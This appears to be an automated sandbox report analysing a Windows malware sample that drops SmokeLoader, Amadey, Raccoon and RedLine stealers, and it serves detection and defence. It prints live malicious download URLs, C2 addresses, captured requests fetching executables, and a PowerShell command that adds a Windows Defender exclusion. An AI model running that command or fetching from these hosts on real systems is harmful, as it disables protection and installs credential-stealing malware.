Loading ...

Play interactive tourEdit tour

Windows Analysis Report cnv622JnZv.exe

Overview

General Information

Sample Name:cnv622JnZv.exe
Analysis ID:511932
MD5:5ae3b69c31fe729ac672ba483280f16d
SHA1:310d993f9fbe7fb9cf3892220d980e08eb5e6286
SHA256:033247a6ba1cd0543f27857fb6743e16fdd2990cea1df3dce93e4031c8046d1a
Tags:exeRaccoonStealer
Infos:

Most interesting Screenshot:

Detection

Amadey Raccoon RedLine SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Early bird code injection technique detected
Detected unpacking (overwrites its own PE header)
Yara detected AntiVM3
Yara detected SmokeLoader
Yara detected Amadey bot
System process connects to network (likely due to code injection or exploit)
Yara detected Raccoon Stealer
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Yara detected UAC Bypass using CMSTP
DLL reload attack detected
Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Adds a directory exclusion to Windows Defender
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Sample uses process hollowing technique
Writes to foreign memory regions
Renames NTDLL to bypass HIPS
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Sigma detected: Powershell Defender Exclusion
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for execution timing, often used to detect debuggers
Entry point lies outside standard sections
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • cnv622JnZv.exe (PID: 1940 cmdline: 'C:\Users\user\Desktop\cnv622JnZv.exe' MD5: 5AE3B69C31FE729AC672BA483280F16D)
    • cnv622JnZv.exe (PID: 6000 cmdline: 'C:\Users\user\Desktop\cnv622JnZv.exe' MD5: 5AE3B69C31FE729AC672BA483280F16D)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • C5EA.exe (PID: 4752 cmdline: C:\Users\user\AppData\Local\Temp\C5EA.exe MD5: 3B947ED5AABDD775B1AFC31A5C4D39A0)
          • C5EA.exe (PID: 1308 cmdline: C:\Users\user\AppData\Local\Temp\C5EA.exe MD5: 3B947ED5AABDD775B1AFC31A5C4D39A0)
        • 66A4.exe (PID: 3536 cmdline: C:\Users\user\AppData\Local\Temp\66A4.exe MD5: F57B28AEC65D4691202B9524F84CC54A)
          • AdvancedRun.exe (PID: 4380 cmdline: 'C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
            • AdvancedRun.exe (PID: 5676 cmdline: 'C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe' /SpecialRun 4101d8 4380 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
          • powershell.exe (PID: 4860 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\66A4.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
            • conhost.exe (PID: 2144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • ComSvcConfig.exe (PID: 572 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe MD5: 2778AE0EB674B74FF8028BF4E51F1DF5)
        • 77DC.exe (PID: 4976 cmdline: C:\Users\user\AppData\Local\Temp\77DC.exe MD5: 42758E2569239A774BECDB12698B124C)
        • 8615.exe (PID: 3888 cmdline: C:\Users\user\AppData\Local\Temp\8615.exe MD5: 73252ACB344040DDC5D9CE78A5D3A4C2)
        • 977B.exe (PID: 2892 cmdline: C:\Users\user\AppData\Local\Temp\977B.exe MD5: AB823DF932B3C2941A9015848EBDB97B)
          • 977B.exe (PID: 6064 cmdline: 977B.exe MD5: AB823DF932B3C2941A9015848EBDB97B)
        • A557.exe (PID: 5684 cmdline: C:\Users\user\AppData\Local\Temp\A557.exe MD5: 9FA070AF1ED2E1F07ED8C9F6EB2BDD29)
          • AdvancedRun.exe (PID: 5528 cmdline: 'C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
        • B084.exe (PID: 6024 cmdline: C:\Users\user\AppData\Local\Temp\B084.exe MD5: 31BE6099D31BDBF1ED339EFFDC1C7064)
        • 152F.exe (PID: 1280 cmdline: C:\Users\user\AppData\Local\Temp\152F.exe MD5: 0EFD1C9D005446AEF5FEE4EB512F5887)
        • 2E26.exe (PID: 1560 cmdline: C:\Users\user\AppData\Local\Temp\2E26.exe MD5: 2880915476E56A16314B067128663950)
        • 977B.exe (PID: 3492 cmdline: 'C:\Users\user\AppData\Local\Temp\977B.exe' MD5: AB823DF932B3C2941A9015848EBDB97B)
  • jejhieg (PID: 3940 cmdline: C:\Users\user\AppData\Roaming\jejhieg MD5: 5AE3B69C31FE729AC672BA483280F16D)
    • jejhieg (PID: 3152 cmdline: C:\Users\user\AppData\Roaming\jejhieg MD5: 5AE3B69C31FE729AC672BA483280F16D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AmadeyYara detected Amadey botJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\A557.exeSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
    • 0x20735:$x1: https://cdn.discordapp.com/attachments/
    • 0x207e9:$x1: https://cdn.discordapp.com/attachments/
    C:\Users\user\AppData\Local\Temp\66A4.exeSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
    • 0x7b593:$x1: https://cdn.discordapp.com/attachments/
    • 0x7b647:$x1: https://cdn.discordapp.com/attachments/
    C:\Users\user\AppData\Local\Temp\77DC.exeSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
    • 0x7a2f9:$x1: https://cdn.discordapp.com/attachments/

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000028.00000000.477374112.0000000000402000.00000040.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      00000028.00000000.478964555.0000000000402000.00000040.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        00000021.00000002.465682057.00000000047F1000.00000004.00020000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          00000028.00000002.518079752.0000000000402000.00000040.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            00000018.00000002.440048320.0000000002FD0000.00000004.00000001.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              Click to see the 18 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              19.0.jejhieg.400000.5.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                18.0.C5EA.exe.400000.4.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                  3.2.cnv622JnZv.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                    18.2.C5EA.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                      17.2.C5EA.exe.2ba15a0.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                        Click to see the 31 entries

                        Sigma Overview

                        System Summary:

                        barindex
                        Sigma detected: Suspicious Script Execution From Temp FolderShow sources
                        Source: Process startedAuthor: Florian Roth, Max Altgelt: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\66A4.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\66A4.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\66A4.exe, ParentImage: C:\Users\user\AppData\Local\Temp\66A4.exe, ParentProcessId: 3536, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\66A4.exe' -Force, ProcessId: 4860
                        Sigma detected: Powershell Defender ExclusionShow sources
                        Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\66A4.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\66A4.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\66A4.exe, ParentImage: C:\Users\user\AppData\Local\Temp\66A4.exe, ParentProcessId: 3536, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\66A4.exe' -Force, ProcessId: 4860
                        Sigma detected: Non Interactive PowerShellShow sources
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\66A4.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\66A4.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\66A4.exe, ParentImage: C:\Users\user\AppData\Local\Temp\66A4.exe, ParentProcessId: 3536, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\66A4.exe' -Force, ProcessId: 4860

                        Jbx Signature Overview

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection:

                        barindex
                        Yara detected Raccoon StealerShow sources
                        Source: Yara matchFile source: 35.3.152F.exe.48f0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 35.3.152F.exe.48f0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 35.2.152F.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 35.2.152F.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000023.00000003.460198021.00000000048F0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000027.00000002.478734177.0000000000941000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000027.00000003.476969852.00000000013F0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000023.00000002.593634201.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 152F.exe PID: 1280, type: MEMORYSTR
                        Antivirus detection for URL or domainShow sources
                        Source: http://sysaheu90.top/game.exeAvira URL Cloud: Label: malware
                        Source: https://toptelete.top/agrybirdsgamereptAvira URL Cloud: Label: malware
                        Source: http://telegalive.top/OAvira URL Cloud: Label: malware
                        Source: http://toptelete.top/agrybirdsgamereptAvira URL Cloud: Label: malware
                        Source: http://privacytoolzforyou-6000.top/downloads/toolspab2.exeAvira URL Cloud: Label: malware
                        Source: http://hajezey1.top/Avira URL Cloud: Label: malware
                        Source: http://telegalive.top/Avira URL Cloud: Label: malware
                        Antivirus detection for dropped fileShow sources
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeAvira: detection malicious, Label: HEUR/AGEN.1138925
                        Source: C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exeAvira: detection malicious, Label: HEUR/AGEN.1138925
                        Multi AV Scanner detection for domain / URLShow sources
                        Source: http://sysaheu90.top/game.exeVirustotal: Detection: 16%Perma Link
                        Multi AV Scanner detection for dropped fileShow sources
                        Source: C:\Users\user\AppData\Local\Temp\152F.exeReversingLabs: Detection: 46%
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeReversingLabs: Detection: 39%
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeReversingLabs: Detection: 79%
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeReversingLabs: Detection: 42%
                        Source: C:\Users\user\AppData\Local\Temp\B084.exeReversingLabs: Detection: 56%
                        Machine Learning detection for sampleShow sources
                        Source: cnv622JnZv.exeJoe Sandbox ML: detected
                        Machine Learning detection for dropped fileShow sources
                        Source: C:\Users\user\AppData\Local\Temp\152F.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\B084.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Roaming\bejhiegJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Roaming\jejhiegJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\C5EA.exeJoe Sandbox ML: detected
                        Source: 34.0.977B.exe.400000.11.unpackAvira: Label: TR/AD.Amadey.ezxiu
                        Source: 34.0.977B.exe.400000.15.unpackAvira: Label: TR/AD.Amadey.ezxiu
                        Source: 18.0.C5EA.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                        Source: 18.0.C5EA.exe.400000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                        Source: 34.0.977B.exe.400000.9.unpackAvira: Label: TR/AD.Amadey.ezxiu
                        Source: 19.0.jejhieg.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                        Source: 19.0.jejhieg.400000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                        Source: 34.0.977B.exe.400000.5.unpackAvira: Label: TR/AD.Amadey.ezxiu
                        Source: 34.0.977B.exe.400000.7.unpackAvira: Label: TR/AD.Amadey.ezxiu
                        Source: 19.0.jejhieg.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                        Source: 19.0.jejhieg.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                        Source: 34.0.977B.exe.400000.13.unpackAvira: Label: TR/AD.Amadey.ezxiu
                        Source: 18.0.C5EA.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                        Source: 18.0.C5EA.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                        Source: 34.0.977B.exe.400000.17.unpackAvira: Label: TR/AD.Amadey.ezxiu

                        Exploits:

                        barindex
                        Yara detected UAC Bypass using CMSTPShow sources
                        Source: Yara matchFile source: 00000016.00000003.482381534.0000000006B8B000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 66A4.exe PID: 3536, type: MEMORYSTR

                        Compliance:

                        barindex
                        Detected unpacking (overwrites its own PE header)Show sources
                        Source: C:\Users\user\AppData\Local\Temp\152F.exeUnpacked PE file: 35.2.152F.exe.400000.0.unpack
                        Source: C:\Users\user\AppData\Local\Temp\152F.exeUnpacked PE file: 35.2.152F.exe.400000.0.unpack
                        Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.5:49826 version: TLS 1.0
                        Source: cnv622JnZv.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                        Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.5:49804 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.5:49808 version: TLS 1.2
                        Source: Binary string: C:\vojos\fuw.pdb source: 8615.exe, 00000018.00000000.413528464.0000000000417000.00000002.00020000.sdmp
                        Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: AdvancedRun.exe, 00000019.00000000.418963154.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000001E.00000000.426329937.000000000040C000.00000002.00020000.sdmp
                        Source: Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: 977B.exe
                        Source: Binary string: C:\wucalehozojoh\setujupiwe-y.pdb source: C5EA.exe, 00000011.00000000.349456240.0000000000401000.00000020.00020000.sdmp, C5EA.exe, 00000012.00000000.364889434.0000000000401000.00000020.00020000.sdmp
                        Source: Binary string: C:\zowazaxopomuh-39\t.pdb source: cnv622JnZv.exe, 00000000.00000000.243398633.0000000000401000.00000020.00020000.sdmp, cnv622JnZv.exe, 00000003.00000000.254610819.0000000000401000.00000020.00020000.sdmp, jejhieg, 00000010.00000000.348546236.0000000000401000.00000020.00020000.sdmp, jejhieg, 00000013.00000000.368105637.0000000000401000.00000020.00020000.sdmp
                        Source: Binary string: wntdll.pdbUGP source: 8615.exe, 00000018.00000002.441461960.000000006B451000.00000020.00020000.sdmp
                        Source: Binary string: wntdll.pdb source: 8615.exe
                        Source: Binary string: DC:\zowazaxopomuh-39\t.pdb source: cnv622JnZv.exe, 00000000.00000000.243398633.0000000000401000.00000020.00020000.sdmp, cnv622JnZv.exe, 00000003.00000000.254610819.0000000000401000.00000020.00020000.sdmp, jejhieg, 00000010.00000000.348546236.0000000000401000.00000020.00020000.sdmp, jejhieg, 00000013.00000000.368105637.0000000000401000.00000020.00020000.sdmp
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeCode function: 34_2_0041B9B2 FindFirstFileExW,

                        Networking:

                        barindex
                        Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49843 -> 185.215.113.45:80
                        Source: TrafficSnort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.5:49847 -> 91.219.236.97:80
                        System process connects to network (likely due to code injection or exploit)Show sources
                        Source: C:\Windows\explorer.exeDomain query: xacokuo8.top
                        Source: C:\Windows\explorer.exeNetwork Connect: 216.128.137.31 80
                        Source: C:\Windows\explorer.exeDomain query: privacytoolzforyou-6000.top
                        Source: C:\Windows\explorer.exeDomain query: hajezey1.top
                        Source: C:\Windows\explorer.exeDomain query: sysaheu90.top
                        Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/903575517888925756/6D9E3C88.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/903575519373697084/F83CB811.jpg HTTP/1.1Host: cdn.discordapp.com
                        Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/903702020781907998/4D0A6361.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/902526114763767818/A623D0D3.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/902526117016109056/AB0F9338.jpg HTTP/1.1Host: cdn.discordapp.com
                        Source: global trafficHTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: toptelete.top
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 91.219.236.97
                        Source: global trafficHTTP traffic detected: GET //l/f/wJ2RyXwB3dP17SpzKGLv/8868635484462b34cd9494990ed8c03cf2975861 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 91.219.236.97
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Oct 2021 18:10:12 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38Last-Modified: Fri, 29 Oct 2021 18:10:01 GMTETag: "54000-5cf81bc649add"Accept-Ranges: bytesContent-Length: 344064Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 07 15 19 94 43 74 77 c7 43 74 77 c7 43 74 77 c7 2c 02 dc c7 6e 74 77 c7 2c 02 e9 c7 61 74 77 c7 2c 02 dd c7 3c 74 77 c7 4a 0c e4 c7 44 74 77 c7 43 74 76 c7 3c 74 77 c7 2c 02 d8 c7 42 74 77 c7 2c 02 ed c7 42 74 77 c7 2c 02 ea c7 42 74 77 c7 52 69 63 68 43 74 77 c7 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 36 ca 8e 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 be 03 00 00 c4 70 02 00 00 00 00 40 c3 01 00 00 10 00 00 00 d0 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 c0 74 02 00 04 00 00 31 96 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 c1 03 00 50 00 00 00 00 50 73 02 a8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 73 02 3c 1b 00 00 30 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 bc 03 00 00 10 00 00 00 be 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a4 69 6f 02 00 d0 03 00 00 16 00 00 00 c2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6c 75 66 75 6c 61 63 e5 02 00 00 00 40 73 02 00 04 00 00 00 d8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 3f 00 00 00 50 73 02 00 40 00 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 22 01 00 00 90 73 02 00 24 01 00 00 1c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Oct 2021 18:10:56 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38Last-Modified: Fri, 29 Oct 2021 18:10:02 GMTETag: "92800-5cf81bc6a9a05"Accept-Ranges: bytesContent-Length: 600064Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 07 15 19 94 43 74 77 c7 43 74 77 c7 43 74 77 c7 2c 02 dc c7 6e 74 77 c7 2c 02 e9 c7 61 74 77 c7 2c 02 dd c7 3c 74 77 c7 4a 0c e4 c7 44 74 77 c7 43 74 76 c7 3c 74 77 c7 2c 02 d8 c7 42 74 77 c7 2c 02 ed c7 42 74 77 c7 2c 02 ea c7 42 74 77 c7 52 69 63 68 43 74 77 c7 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5d 6f 8e 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 a6 07 00 00 c4 70 02 00 00 00 00 c0 aa 05 00 00 10 00 00 00 c0 07 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 b0 78 02 00 04 00 00 d2 54 09 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 